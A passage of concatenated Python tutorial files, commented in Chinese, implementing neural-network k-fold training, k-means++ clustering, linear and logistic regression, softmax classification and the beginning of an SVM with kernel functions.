acc_ru = sess.run(accu, feed_dict={x_data: xdata})
acc_rughy_train = outvsreal(judge(acc_ru), ydata)
# 存储
acc_vec.append(acc_rughy_train)
# 验证精确率
acu = sess.run(accu, feed_dict={x_data: addxdata})
acc_rughy = outvsreal(judge(acu), addydata)
# 存储
acc_vec_add.append(acc_rughy)
print('%s代误差: [训练:%.4f, 验证:%.4f], 正确率: [训练:%.4f, 验证:%.4f]' % (i, temp_loss, temp_loss_add, \
acc_rughy_train, acc_rughy))
accudict[i] = [acc_rughy_train, acc_rughy]
# # 判断提前退出 , 验证数据集正确率连续三下降
# if len(acc_vec_add) >= 4:
# # 判断连续三次下降
# edlist = acc_vec_add[-4:-1]
# delist = acc_vec_add[-3:]
# sublist = np.array(edlist) - np.array(delist)
# if np.all(sublist > 0):
# break
# 为了避免,陷入局部小值,当运行一定代数后,如果精确度未达到某值,则重新训练
if i > 30 and max(acc_vec) - min(acc_vec) < 0.3:
tf.reset_default_graph()
sess.close()
return False
# 在所有的循环次数中,找到综合精确度最高的一次,保存参数
zongheaccu = 0.1 * acc_rughy_train + 0.9 * acc_rughy
if zongheaccu > accunum:
accunum = zongheaccu
# 保存模型
saver.save(sess, './gu/%smodel' % kcount, global_step=i) #注意路径
sign = max(accudict.items(), key=lambda d: 0.1 * d[1][0] + 0.9 * d[1][1])[0]
print('%s 折运行完毕,模型已经保存,最优的是%s代' % (kcount, sign))
return loss_vec[: sign + 1], loss_vec_add[: sign + 1], acc_vec[: sign + 1], acc_vec_add[: sign + 1], sign, hiddenlayers
'''Part 4: data'''
DDatadict = bpd.kfold_train_datadict
# 将数据分为输入数据以及输出数据
def divided(data, cgu=countclass):
indata = data[:, :-cgu]
outdata = data[:, -cgu:]
return indata, outdata
# 将数据字典的值转化为训练输入,训练输出,验证输入、验证输出
def transall(listdata, count=countclass):
trin, trout = divided(listdata[0], count)
yanin, yanout = divided(listdata[1], count)
return trin, trout, yanin, yanout
'''Part 5: the final run script'''
if __name__ == "__main__":
# 存储正确率 训练
corrsave_train = []
# 存储正确率 验证
corrsave_add = []
# 存储测试集合的正确率
corrsave_test = []
TEST_In, TEST_Out = divided(bpd.Test_data.values)
# 开始K折交叉验证
for fold in DDatadict:
TRAIN_In, TRAIN_Out, ADD_In, ADD_Out = transall(DDatadict[fold])
while 1:
bpnn = Ten_train(TRAIN_In, TRAIN_Out, ADD_In, ADD_Out, fold)
if bpnn:
break
# 下载刚才已经保存的模型
#tf.reset_default_graph()
graph = tf.train.import_meta_graph("./gu/%smodel-%s.meta" % (fold, bpnn[4]))
ses = tf.Session()
graph.restore(ses, tf.train.latest_checkpoint('./'))
op_to_restore = tf.get_default_graph().get_tensor_by_name("Add_%s:0" % bpnn[5])
w1 = tf.get_default_graph().get_tensor_by_name("x_data:0")
feed_dict = {w1: TEST_In}
dgsio = ses.run(op_to_restore, feed_dict)
# 测试数据集正确率
add_on_op = outvsreal(judge(dgsio), TEST_Out)
print('第%s折测试正确率为' % fold, add_on_op)
# 清空图
ses.close()
tf.reset_default_graph()
# 测试添加
corrsave_test.append(add_on_op)
# 训练正确率添加
corrsave_train.append(bpnn[2][-1])
# 验证正确率添加
corrsave_add.append(bpnn[3][-1])
# 绘制训练数据集与验证数据集的正确率以及误差曲线
fig, ax1 = plt.subplots()
ax1.set_xlabel('代数')
ax1.set_ylabel('误差', color='r')
plt.plot(list(range(len(bpnn[0]))), bpnn[0], label='训练', color='r', marker='*', linewidth=2)
plt.plot(list(range(len(bpnn[1]))), bpnn[1], label='验证', color='r', marker='.', linewidth=2)
ax1.tick_params(axis='y', labelcolor='r')
legend = ax1.legend(loc='upper center', shadow=True, fontsize='x-large')
legend.get_frame().set_facecolor('#F0F8FF')
ax1.grid(True)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
ax2.set_ylabel('正确率', color='b') # we already handled the x-label with ax1
plt.plot(list(range(len(bpnn[2]))), bpnn[2], label='训练', color='b', marker='*', linewidth=2)
plt.plot(list(range(len(bpnn[3]))), bpnn[3], label='验证', color='b', marker='.', linewidth=2)
ax2.tick_params(axis='y', labelcolor='b')
legen = ax2.legend(loc='lower center', shadow=True, fontsize='x-large')
legen.get_frame().set_facecolor('#FFFAFA')
ax2.grid(True)
ax2.yaxis.set_major_locator(y_toge)
ax2.yaxis.set_minor_locator(y_son)
fig.tight_layout() # otherwise the right y-label is slightly clipped
plt.title('%s折训练VS验证 结果对比' % fold, fontsize=16)
plt.savefig(r'C:\Users\GWT9\Desktop\%s_fol8.jpg' % fold)
# 绘制K次的结果展示
plt.figure()
plt.plot(list(range(len(corrsave_train))), corrsave_train, label='训练', color='b', marker='s', linewidth=2)
plt.plot(list(range(len(corrsave_add))), corrsave_add, label='验证', color='r', marker='8', linewidth=2)
plt.plot(list(range(len(corrsave_test))), corrsave_test, label='测试', color='k', marker='d', linewidth=2)
plt.xlabel('折数')
plt.ylabel('正确率')
plt.title('绘制K次的不同数据集的结果展示', fontsize=16)
plt.grid(True)
plt.legend()
plt.savefig(r'C:\Users\GWT9\Desktop\last_fol8.jpg')
plt.show()
```
#### File: Machine-Learning-for-Beginner-by-Python3/Kmeans Cluster/Kmeans_AnFany.py
```python
from Wine_Data import DATA
import numpy as np
# 定义欧几里得距离
def dis(sample, center):
cen = np.array([center])
sample = np.array(sample)
if len(sample) != 0:
usb = np.sum((sample - cen) ** 2, axis=1) ** 0.5
return usb
else:
return 0
# 定义根据距离列表,概率较大的被选中
def selec(dislist):
#首先将所有数值除以距离和
divided = dislist / np.sum(dislist)
# 随机选取0-1之内的数字
num = np.random.random()
for hh in range(len(divided)):
num -= divided[hh]
if num < 0:
return hh
# 定义生成初始的聚类中心的函数
def gencenter(sample, type):
# 随机选择初始的样本编号
sign = np.random.choice(list(range(len(sample))), 1)[0]
#存储类别中心的数组
centerlist = [sample[sign]]
while len(centerlist) < type:
# 添加新的
distance = dis(sample, centerlist[-1]) # 和刚添加的中心计算距离
newsign = selec(distance)
centerlist.append(sample[newsign])
return np.array(centerlist)
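# Editorial note: this is a simplified k-means++ style seeding — each new centre is drawn
# with probability proportional to its distance from the most recently added centre,
# whereas canonical k-means++ uses the squared distance to the nearest of all centres
# chosen so far.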
# Kmeans++聚类算法
def kmeans(samp, maxtimes, costerror, countcenter):
# kmeans++ 产生出的初始的类别中心
center = gencenter(samp, type=countcenter)
# 存储成本函数的值
costfunc = []
iter = 0
while iter < maxtimes:
# 开始根据类别中心匹配距离
samdict = {}
signdict = {}
# 每个类别 定义成一个集合
for jj in range(len(center)):
samdict[jj] = [] # 存储样本
signdict[jj] = [] # 存储样本编号
# 为每一个样本计算类别
dictgn = 0
for hg in samp:
ddis = dis(center, hg) #计算样本与每一个类别中心的距离
# 找到最小的
minsign = ddis.argmin()
samdict[minsign].append(hg) # 添加到该类别的样本集合中
signdict[minsign].append(dictgn)
dictgn += 1
# 计算此时分类结果的cost
cost = 0
for cc in samdict:
cost += np.sum(dis(samdict[cc], center[cc]))
# 存储cost
costfunc.append(cost)
# 判断是否提前结束迭代
if len(costfunc) > 2:
if 0 <= costfunc[-2] - costfunc[-1] < costerror:
break
# 更新类别中心
for kk in samdict:
if len(signdict[kk]) != 0:
center[kk] = np.mean(samdict[kk], axis=0) # 均值
iter += 1
return center, costfunc, signdict
# 因为Kmeans 算法不保证每一次都取得最优值。因此定义运行的次数,选择cost最小的
def op_kmeans(saple, maxti=1000, costerr=1e-19, countcen=3, maxtimes=90):
times = 0
# 存储cost
costff = [1e9]
#最优的结果lastre
lastre = 0
while times < maxtimes:
step = kmeans(saple, maxtimes=maxti, costerror=costerr, countcenter=countcen)
if len(costff) != 0:
if costff[0] > step[1][-1]:
lastre = step
costff = [step[1][-1]]
else:
costff = [step[1][-1]]
times += 1
return lastre
# 结果验证
# 首先得出原始数据中的类别对应的编号
def get_start(ydata):
in_class = {}
classtype = sorted(list(set(list(ydata))))
for du in range(len(classtype)):
in_class[du+1] = np.arange(len(ydata))[ydata == classtype[du]]
return in_class
# 因为算法生成的类别和原始的类别的对应关系不知,下面按照最大的重复比来一一确认
def judge(starclass, endclass, ydata):
newclass = {} #存储判断出类别后的数据
clasdict = {} # 存储算法生成的类别和真实类别的对应关系的字典
for ekey in endclass:
judg = []
for skey in starclass:
# 判断和原始类别中的哪一个元素重复比最高
repeat = [len([val for val in endclass[ekey] if val in starclass[skey]]), skey]
judg.append(repeat)
# 选择最大的数,确定类别
judg = np.array(judg)
du = judg[judg.argmax(axis=0)[0]][1] #判断出来属于哪一类
clasdict[ekey] = du # 算法生成的类别:原始的类别
newclass[du] = endclass[ekey]
# 按样本的序号输出其对应的类别
newdata = np.ones(len(ydata))
for fgh in newclass:
for hu in newclass[fgh]:
newdata[hu] = fgh
return newdata, clasdict
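# Illustrative mapping (editorial): if algorithm cluster 0 shares most of its sample indices
# with true class 2, then clasdict maps {0: 2, ...} and every sample in that cluster is
# relabelled as 2 in newdata.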
# 计算混淆矩阵
#计算混淆矩阵
from prettytable import PrettyTable
def confusion(realy, outy, method='AnFany'):
mix = PrettyTable()
type = sorted(list(set(realy.T[0])), reverse=True)
mix.field_names = [method] + ['预测:%d类'%si for si in type]
# 字典形式存储混淆矩阵数据
cmdict = {}
for jkj in type:
cmdict[jkj] = []
for hh in type:
hu = len(['0' for jj in range(len(realy)) if realy[jj][0] == jkj and outy[jj][0] == hh])
cmdict[jkj].append(hu)
# 输出表格
for fu in type:
mix.add_row(['真实:%d类'%fu] + cmdict[fu])
return mix
# 最终的程序
if __name__ == "__main__":
init_class = get_start(DATA[1])
kresult = op_kmeans(DATA[0])
newy = judge(init_class, kresult[2], DATA[1])
# #输出混淆矩阵
print('混淆矩阵:\n', confusion(np.array([DATA[1]]).T, np.array([newy[0]]).T))
# 输出最后计算得到的真实类别的类别中心
for real in kresult[2]:
print('类别%s的中心为:\n%s' % (newy[1][real], kresult[0][real]))
# 绘制成本函数图
import matplotlib.pyplot as plt
from pylab import mpl # 作图显示中文
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 设置中文字体新宋体
mpl.rcParams['axes.unicode_minus'] = False
plt.plot(list(range(len(kresult[1]))), kresult[1], '-', linewidth=5)
plt.title('成本函数图')
plt.ylabel('Cost 值')
plt.xlabel('迭代次数')
plt.show()
```
#### File: Machine-Learning-for-Beginner-by-Python3/Kmeans Cluster/Kmeans_Compare.py
```python
import Kmeans_AnFany as K_Af # AnFany
import Kmeans_Sklearn as K_Sk # Sklearn
import matplotlib.pyplot as plt
from pylab import mpl # 作图显示中文
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 设置中文字体新宋体
mpl.rcParams['axes.unicode_minus'] = False
import numpy as np
# 利用sklearn生成数据集
from sklearn.datasets import make_blobs
X, Y = make_blobs(n_samples=600, centers=6, n_features=2)
# 绘制散点图
def fig_scatter(exdata, eydata, titl='训练数据散点图', co=['r', 'g', 'k', 'b', 'y', 'm'], marker=['o','^','H','v','d','>']):
typeclass = sorted(list(set(eydata)))
for ii in range(len(typeclass)):
datax = exdata[eydata == typeclass[ii]]
plt.scatter(datax[:, 0], datax[:, -1], c=co[ii], s=50, marker=marker[ii])
plt.title(titl)
#plt.legend(['%d类'%i for i in typeclass], bbox_to_anchor=(1.2, 0.9))
plt.xlabel('特征1')
plt.ylabel('特征2')
# 调用不同的方法
# AnFany
kresult = K_Af.op_kmeans(X, countcen=6)
# Sklearn
sk = K_Sk.KMeans(init='k-means++', n_clusters=6, n_init=10)
train = sk.fit(X)
result = sk.predict(X)
skru = K_Sk.trans(result)
#绘制算法后的类别的散点图
def sca(Xdata, Center, signdict, co=['r', 'g', 'y', 'b', 'c', 'm'], marker=['o','^','H','s','d','*'], titl = 'AnFany 结果'):
du = 1
for jj in signdict:
xdata = Xdata[signdict[jj]]
plt.scatter(xdata[:, 0], xdata[:, -1], c=co[jj], s=50, marker=marker[jj], label='%d类' % jj) # 绘制样本散点图
for ss in Center:
if du:
plt.scatter(ss[0], ss[1], c='k', s=100, marker='8', label='类别中心') #绘制类别中心点
du = 0
else:
plt.scatter(ss[0], ss[1], c='k', s=100, marker='8') # 绘制类别中心点
plt.legend(bbox_to_anchor=(1.2, 1))
plt.title(titl)
plt.xlabel('特征1')
plt.ylabel('特征2')
# 定义欧几里得距离
def dis(sample, center):
cen = np.array([center])
sample = np.array(sample)
if len(sample) != 0:
usb = np.sum((sample - cen) ** 2, axis=1) ** 0.5
return usb
else:
return 0
# 计算最终的分类结果的成本值
def Cost(Xdata, typedict):
center = {}
for kk in typedict:
center[kk] = np.mean(Xdata[typedict[kk]], axis=0) # 均值
cio = 0
for cc in typedict:
cio += np.sum(dis(Xdata[typedict[cc]], center[cc]))
return cio
# 最终的结果展示
plt.subplot(2, 2, 1)
fig_scatter(X, Y)
plt.subplot(2, 2, 2)
sca(X, kresult[0], kresult[2])
plt.subplot(2, 2, 3)
sca(X, train.cluster_centers_, skru, titl='Sklearn 结果')
plt.subplot(2, 2, 4)
plt.axis('off')
plt.text(0.3, 0.6, 'AnFany 最终的分类成本值为:%.5f'%Cost(X, kresult[2]))
plt.text(0.3, 0.3, 'Sklearn 最终的分类成本值为:%.5f'%Cost(X, skru))
plt.show()
```
#### File: Machine-Learning-for-Beginner-by-Python3/Kmeans Cluster/Kmeans_Sklearn.py
```python
from Wine_Data import DATA
import numpy as np
from sklearn.cluster import KMeans
# 需要将算法输出的类别转换为真实的类别
# 首先得出原始数据中的类别对应的编号
def get_start(ydata):
in_class = {}
classtype = sorted(list(set(list(ydata))))
for du in range(len(classtype)):
in_class[du+1] = np.arange(len(ydata))[ydata == classtype[du]]
return in_class
# 因为算法生成的类别和原始的类别的对应关系不知,下面按照最大的重复比来一一确认
def judge(starclass, endclass, ydata):
newclass = {} #存储判断出类别后的数据
clasdict = {} # 存储算法生成的类别和真实类别的对应关系的字典
for ekey in endclass:
judg = []
for skey in starclass:
# 判断和原始类别中的哪一个元素重复比最高
repeat = [len([val for val in endclass[ekey] if val in starclass[skey]]), skey]
judg.append(repeat)
# 选择最大的数,确定类别
judg = np.array(judg)
du = judg[judg.argmax(axis=0)[0]][1] #判断出来属于哪一类
clasdict[ekey] = du # 算法生成的类别:原始的类别
newclass[du] = endclass[ekey]
# 按样本的序号输出其对应的类别
newdata = np.ones(len(ydata))
for fgh in newclass:
for hu in newclass[fgh]:
newdata[hu] = fgh
return newdata, clasdict
# 计算混淆矩阵
#计算混淆矩阵
from prettytable import PrettyTable
def confusion(realy, outy, method='Sklearn'):
mix = PrettyTable()
type = sorted(list(set(realy.T[0])), reverse=True)
mix.field_names = [method] + ['预测:%d类'%si for si in type]
# 字典形式存储混淆矩阵数据
cmdict = {}
for jkj in type:
cmdict[jkj] = []
for hh in type:
hu = len(['0' for jj in range(len(realy)) if realy[jj][0] == jkj and outy[jj][0] == hh])
cmdict[jkj].append(hu)
# 输出表格
for fu in type:
mix.add_row(['真实:%d类'%fu] + cmdict[fu])
return mix
# 将sklearn输出的结果变为字典形式
def trans(resu):
redict = {}
for ire in range(len(resu)):
try:
redict[resu[ire]].append(ire)
except KeyError:
redict[resu[ire]] = [ire]
return redict
# 最终的程序
if __name__ == "__main__":
sk = KMeans(init='k-means++', n_clusters=3, n_init=10)
train = sk.fit(DATA[0])
result = sk.predict(DATA[0])
init_class = get_start(DATA[1])
kresult = trans(result)
newy = judge(init_class, kresult, DATA[1])
# 输出混淆矩阵
print('混淆矩阵:\n', confusion(np.array([DATA[1]]).T, np.array([newy[0]]).T))
# 输出类别中心
print(train.cluster_centers_)
```
#### File: Machine-Learning-for-Beginner-by-Python3/Linear Regression/Linear_Regression_AnFany.py
```python
from Boston_Data import model_data as lrdata
import numpy as np
#创建线性回归的类
class LinearRegression:
#w和b合为一个参数,也就是x最后加上一列全为1的数据
def __init__(self, learn_rate=0.2, iter_times=200000, error=1e-9):
self.learn_rate = learn_rate
self.iter_times = iter_times
self.error = error
def Trans(self, xdata):
one1 = np.ones(len(xdata))
xta = np.append(xdata, one1.reshape(-1, 1), axis=1)
return xta
#梯度下降法
def Gradient(self, xdata, ydata):
xdata = self.Trans(xdata)
#系数w,b的初始化
self.weights = np.zeros((len(xdata[0]), 1))
#存储成本函数的值
cost_function = []
for i in range(self.iter_times):
#得到回归的值
y_predict = np.dot(xdata, self.weights)
# 最小二乘法计算误差
cost = np.sum((y_predict - ydata) ** 2) / len(xdata)
cost_function.append(cost)
#计算梯度
dJ_dw = 2 * np.dot(xdata.T, (y_predict - ydata)) / len(xdata)
#更新系数w,b的值
self.weights = self.weights - self.learn_rate * dJ_dw
#提前结束循环的机制
if len(cost_function) > 1:
if 0 < cost_function[-2] - cost_function[-1] < self.error:
break
return self.weights, cost_function
#根据公式
def Formula(self, xdata, ydata):
xdata = self.Trans(xdata)
self.weights = np.dot(np.dot(np.linalg.inv(np.dot(xdata.T, xdata)), xdata.T), ydata)
y_predict = np.dot(xdata, self.weights)
cost = [np.sum((ydata - np.mean(ydata)) ** 2) / len(xdata)] # 开始是以y值得平均值作为预测值计算cost
cost += [np.sum((y_predict - ydata) ** 2) / len(xdata)] # 利用公式,一次计算便得到参数的值,不需要迭代。
return self.weights, cost # 包括2个值
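    # Editorial note: Formula() implements the normal equation w = (X^T X)^{-1} X^T y;
    # it assumes X^T X is invertible (no perfectly collinear columns), otherwise
    # np.linalg.inv above will raise a LinAlgError.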
#预测
def predict(self, xdata):
return np.dot(self.Trans(xdata), self.weights)
#绘图
import matplotlib.pyplot as plt
from pylab import mpl # 作图显示中文
mpl.rcParams['font.sans-serif'] = ['SimHei'] # 设置中文字体
mpl.rcParams['axes.unicode_minus'] = False
def figure(title, *datalist):
for jj in datalist:
plt.plot(jj[0], '-', label=jj[1], linewidth=2)
plt.plot(jj[0], 'o')
plt.grid()
plt.title(title)
plt.legend()
plt.show()
#计算R2的函数
def getR(ydata_tr, ydata_pre):
sum_error = np.sum(((ydata_tr - np.mean(ydata_tr)) ** 2))
inexplicable = np.sum(((ydata_tr - ydata_pre) ** 2))
return 1 - inexplicable / sum_error
# 最终的程序
if __name__ == "__main__":
regressor = LinearRegression()
# 开始训练
train_error = regressor.Gradient(lrdata[0], lrdata[1])
# 用于预测数据的预测值
predict_result = regressor.predict(lrdata[2])
# 用于训练数据的预测值
train_pre_result = regressor.predict(lrdata[0])
# 绘制误差图
figure('误差图 最终的MSE = %.4f' % (train_error[1][-1]), [train_error[1], 'error'])
# 绘制预测值与真实值图
figure('预测值与真实值图 模型的' + r'$R^2=%.4f$' % (getR(lrdata[1], train_pre_result)), [predict_result, '预测值'],
[lrdata[3], '真实值'])
plt.show()
# 线性回归的参数
print('线性回归的系数为:\n w = %s, \nb= %s' % (train_error[0][:-1], train_error[0][-1]))
```
#### File: Machine-Learning-for-Beginner-by-Python3/Linear Regression/TensorFlow_rewrite.py
```python
import tensorflow as tf
# 参数
#对于没有归一化的数据,一般要设置较小的学习率
def train_tf(xxdata, yydata, learn_rate=0.00002, iter_times=6000, error=1e-9):
#占位符
# 预先输入的数据
x_data = tf.placeholder(shape=[None, len(xxdata[0])], dtype=tf.float32)
y_data = tf.placeholder(shape=[None, 1], dtype=tf.float32)
# 线性回归参数
Weight = tf.Variable(tf.random_normal(shape=[len(xxdata[0]), 1]))
Bias = tf.Variable(tf.random_normal(shape=[1, 1]))
y_out = tf.add(tf.matmul(x_data, Weight), Bias)
# 损失函数
cost = tf.reduce_mean(tf.square(y_out - y_data)) #+ reg_term
# 初始化
sess = tf.Session()
init = tf.global_variables_initializer()
sess.run(init)
optimizer = tf.train.GradientDescentOptimizer(learn_rate).minimize(cost)
#误差存储
costfunc = []
for i in range(iter_times):
sess.run(optimizer, feed_dict={x_data: xxdata, y_data: yydata})
y_step_out = sess.run(y_out, feed_dict={x_data: xxdata})
loss = sess.run(cost, feed_dict={y_out: y_step_out, y_data: yydata})
costfunc.append(loss)
# 提前结束循环的机制
if len(costfunc) > 1:
if 0 < costfunc[-2] - costfunc[-1] < error:
break
predata = sess.run(y_out, feed_dict={x_data: xxdata})
return predata, Weight.eval(session=sess), Bias.eval(session=sess)
```
#### File: Machine-Learning-for-Beginner-by-Python3/Logistic Regression/LR_AnFany.py
```python
from Heart_Data import model_data as H_Data
import numpy as np
#计算混淆矩阵
from prettytable import PrettyTable
def confusion(realy, outy):
mix = PrettyTable()
type = sorted(list(set(realy.T[0])), reverse=True)
mix.field_names = [' '] + ['预测:%d类'%si for si in type]
# 字典形式存储混淆矩阵数据
cmdict = {}
for jkj in type:
cmdict[jkj] = []
for hh in type:
hu = len(['0' for jj in range(len(realy)) if realy[jj][0] == jkj and outy[jj][0] == hh])
cmdict[jkj].append(hu)
# 输出表格
for fu in type:
mix.add_row(['真实:%d类'%fu] + cmdict[fu])
return mix
# 返回混淆矩阵用到的数据TP,TN,FP,FN
def getmatrix(realy, outy, possclass=1): # 默认类1 为正类
TP = len(['0' for jj in range(len(realy)) if realy[jj][0] == possclass and outy[jj][0] == possclass]) # 实际正预测正
TN = len(['0' for jj in range(len(realy)) if realy[jj][0] == 1 - possclass and outy[jj][0] == 1 - possclass]) # 实际负预测负
FP = len(['0' for jj in range(len(realy)) if realy[jj][0] == 1- possclass and outy[jj][0] == possclass]) # 实际负预测正
FN = len(['0' for jj in range(len(realy)) if realy[jj][0] == possclass and outy[jj][0] == 1 - possclass]) # 实际正预测负
# 假正率
FPR = FP / (FP + TN)
# 真正率
TPR = TP / (TP + FN)
return [FPR, TPR]
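# Worked example (editorial): with TP=40, FN=10, FP=5, TN=45 the function returns
# FPR = 5 / (5 + 45) = 0.1 and TPR = 40 / (40 + 10) = 0.8, i.e. one point on the ROC curve.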
class LRReg:
def __init__(self, learn_rate=0.5, iter_times=40000, error=1e-9, cpn='L2'):
self.learn_rate = learn_rate
self.iter_times = iter_times
self.error = error
self.cpn = cpn
# w和b合为一个参数,也就是x最后加上一列全为1的数据。
def trans(self, xdata):
one1 = np.ones(len(xdata))
xta = np.append(xdata, one1.reshape(-1, 1), axis=1)
return xta
# 梯度下降法
def Gradient(self, xdata, ydata, func=trans):
xdata = func(self, xdata)
# 系数w,b的初始化
self.weights = np.zeros((len(xdata[0]), 1))
# 存储成本函数的值
cost_function = []
for i in range(self.iter_times):
# 得到回归的值
y_predict = np.dot(xdata, self.weights)
# Sigmoid函数的值
s_y_pre = 1/ (1 + np.exp(-y_predict))
# 计算最大似然的值
like = np.sum(np.dot(ydata.T, np.log(s_y_pre)) + np.dot((1 - ydata).T, np.log(1- s_y_pre)))
# 正则化
if self.cpn == 'L2':
# 成本函数中添加系数的L2范数
l2norm = np.sum(0.5 * np.dot(self.weights.T, self.weights) / len(xdata))
cost = -like / len(xdata) + l2norm
grad_W = np.dot(xdata.T, (s_y_pre - ydata)) / len(xdata) + 0.9 * self.weights / len(xdata)
else:
cost = -like / (len(xdata))
grad_W = np.dot(xdata.T, (s_y_pre - ydata)) / len(xdata)
cost_function.append(cost)
print(cost, like)
# 训练提前结束
if len(cost_function) > 2:
if 0 <= cost_function[-1] - cost_function[-2] <= self.error:
break
#更新
self.weights = self.weights - self.learn_rate * grad_W
return self.weights, cost_function
# 预测
def predict(self, xdata, func=trans, yuzhi=0.5):
pnum = np.dot(func(self, xdata), self.weights)
s_pnum = 1/ (1 + np.exp(-pnum))
latnum = [[1] if jj[0] >= yuzhi else [0] for jj in s_pnum]
return latnum
# 主函数
if __name__ == "__main__":
lr_re = LRReg()
lf = lr_re.Gradient(H_Data[0], H_Data[1])
print('系数为:\n', lr_re.weights)
# 绘制ROC曲线
# 从0到1定义不同的阈值
yuzi = np.linspace(0, 1, 101)
# ROC 曲线数据
roc = []
# 开始遍历不同的阈值
for yy in yuzi:
fdatd = lr_re.predict(H_Data[0], yuzhi=yy)
if yy == 0.5:
print('阈值为%s时的混淆矩阵:\n' % yy, confusion(H_Data[1], fdatd))
roc.append(getmatrix(H_Data[1], fdatd))
# 绘制ROC曲线图
# 首线是FPR按着从小到大排列
fu = np.array(sorted(roc, key=lambda x: x[0]))
import matplotlib.pyplot as plt
from pylab import mpl # 作图显示中文
mpl.rcParams['font.sans-serif'] = ['Microsoft Yahei']
# 开始绘制ROC曲线图
fig, ax1 = plt.subplots()
ax1.plot(list(fu[:, 0]), list(fu[:, 1]), '.', linewidth=4, color='r')
ax1.plot([0, 1], '--', linewidth=4)
ax1.grid('on')
ax1.legend(['分类器模型', '随机判断模型'], loc='lower right', shadow=True, fontsize='medium')
ax1.annotate('完美分类器', xy=(0, 1), xytext=(0.2, 0.7), color='#FF4589', arrowprops=dict(facecolor='#FF67FF'))
ax1.set_title('ROC曲线', color='#123456')
ax1.set_xlabel('False Positive Rate(FPR,假正率)', color='#123456')
ax1.set_ylabel('True Positive Rate(TPR,真正率)', color='#123456')
# 绘制成本函数图
fig, ax2 = plt.subplots()
ax2.plot(list(range(len(lf[1]))), lf[1], '-', linewidth=5)
ax2.set_title('成本函数图')
ax2.set_ylabel('Cost 值')
ax2.set_xlabel('迭代次数')
plt.show()
```
#### File: Machine-Learning-for-Beginner-by-Python3/Softmax Regression/Softmax_Sklearn.py
```python
import sklearn as sk
from Iris_Data import Data as smdata
import numpy as np
from sklearn.linear_model import LogisticRegression
sklr = LogisticRegression(multi_class='multinomial', solver='sag', C=200, max_iter=10000)
#格式化输出混淆矩阵
from prettytable import PrettyTable
def confusion(realy, outy, method='Sklearn'):
mix = PrettyTable()
type = sorted(list(set(realy.T[0])), reverse=True)
mix.field_names = [method] + ['预测:%d类'%si for si in type]
# 字典形式存储混淆矩阵数据
cmdict = {}
for jkj in type:
cmdict[jkj] = []
for hh in type:
hu = len(['0' for jj in range(len(realy)) if realy[jj][0] == jkj and outy[jj][0] == hh])
cmdict[jkj].append(hu)
# 输出表格
for fu in type:
mix.add_row(['真实:%d类'%fu] + cmdict[fu])
return mix
# 将独热编码的类别变为标识为1,2,3的类别
def transign(eydata):
ysign = []
for hh in eydata:
ysign.append([list(hh).index(1) + 1])
return np.array(ysign)
# 主函数
if __name__ == '__main__':
regre = sklr.fit(smdata[0], transign(smdata[1]).T[0])
predata = np.array([sklr.predict(smdata[0])]).T
print('系数为:\n', np.hstack((sklr.coef_, np.array([sklr.intercept_]).T)).T)
print('混淆矩阵:\n', confusion(transign(smdata[1]), predata))
```
#### File: SVM/SVM_Classify/AnFany_SVM_Classify.py
```python
"""
Part 1: import libraries
"""
import numpy as np
import matplotlib.pyplot as plt
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 中文字体名称
mpl.rcParams['axes.unicode_minus'] = False # 显示负号
"""
Part 2: build the kernel functions and the SVM structure
"""
# 构建核函数
class KERNEL:
"""
    linear: linear   rbf: Gaussian   sigmoid: sigmoid-type   poly: polynomial
    Kernel functions: mind the shape of the input data and of the returned array.
    x vs y covers 3 cases: single sample vs single sample, single vs multiple, multiple vs multiple samples.
"""
def __init__(self, polyd=3, rbfsigma=0.2, tanhbeta=0.6, tanhtheta=-0.6):
self.polyd = polyd
self.rbfsigma = rbfsigma
self.tanhbeta = tanhbeta
self.tanhtheta = tanhtheta
def trans(self, x):
x = np.array(x)
if x.ndim == 1:
x = np.array([x])
return x
# 线性核函数
def linear(self, x, y): # 输出的结果shape=(len(y), len(x))
x, y = self.trans(x), self.trans(y)
if len(x) == 1:
return (x * y).sum(axis=1, keepdims=True)
else:
sx = x.reshape(x.shape[0], -1, x.shape[1])
return (sx * y).sum(axis=2).T
# Singmoid型核函数
def sigmoid(self, x, y): # 输出的结果shape=(len(y), len(x))
x, y = self.trans(x), self.trans(y)
if len(x) == 1:
return np.tanh(self.tanhbeta * ((x * y).sum(axis=1, keepdims=True)) + self.tanhtheta)
else:
sx = x.reshape(x.shape[0], -1, x.shape[1])
return np.tanh(self.tanhbeta * ((sx * y).sum(axis=2).T) + self.tanhtheta)
# 多项式核函数
def poly(self, x, y): # 输出的结果shape=(len(y), len(x))
x, y = self.trans(x), self.trans(y)
if len(x) == 1:
return (x * y).sum(axis=1, keepdims=True) ** self.polyd
else:
sx = x.reshape(x.shape[0], -1, x.shape[1])
return (sx * y).sum(axis=2).T ** self.polyd
# 高斯核函数
def rbf(self, x, y): # 输出的结果shape=(len(y), len(x))
x, y = self.trans(x), self.trans(y)
if len(x) == 1 and len(y) == 1:
return np.exp(self.linear((x - y), (x - y)) / (-2 * self.rbfsigma ** 2))
elif len(x) == 1 and len(y) != 1:
return np.exp((np.power(x - y, 2)).sum(axis=1, keepdims=True) / (-2 * self.rbfsigma ** 2))
else:
sx = x.reshape(x.shape[0], -1, x.shape[1])
return np.exp((np.power(sx - y, 2)).sum(axis=2).T / (-2 * self.rbfsigma ** 2))
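# Quick sanity check (editorial, illustrative only): the RBF kernel of a point with itself
# is exp(0) = 1, and it decays towards 0 as the points move apart.
# KERNEL(rbfsigma=0.2).rbf([1.0, 0.0], [1.0, 0.0])   # -> array([[1.]])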
# 构建SVM的结构
class SVM:
def __init__(self, feature, labels, kernel='rbf', C=0.8, toler=0.001, times=100):
# 训练样本的属性数据、标签数据
self.feature = feature
self.labels = labels
# SMO算法变量
self.C = C
self.toler = toler
self.alphas = np.zeros(len(self.feature))
self.b = 0
self.eps = 0.0001 # 选择拉格朗日因子
# 核函数
self.kernel = eval('KERNEL().' + kernel)
# 拉格朗日误差序列
self.errors = [self.get_error(i) for i in range(len(self.feature))]
# 循环的最大次数
self.times = times
# 计算分割线的值
def line_num(self, x):
ks = self.kernel(x, self.feature)
wx = np.matrix(self.alphas * self.labels) * ks
num = wx + self.b
return num[0][0]
# 获得编号为i的样本对应的误差
def get_error(self, i):
x, y = self.feature[i], self.labels[i]
error = self.line_num(x) - y
return error
# 更改拉格朗日因子后,更新所有样本对应的误差
def update_errors(self):
self.errors = [self.get_error(i) for i in range(len(self.feature))]
"""
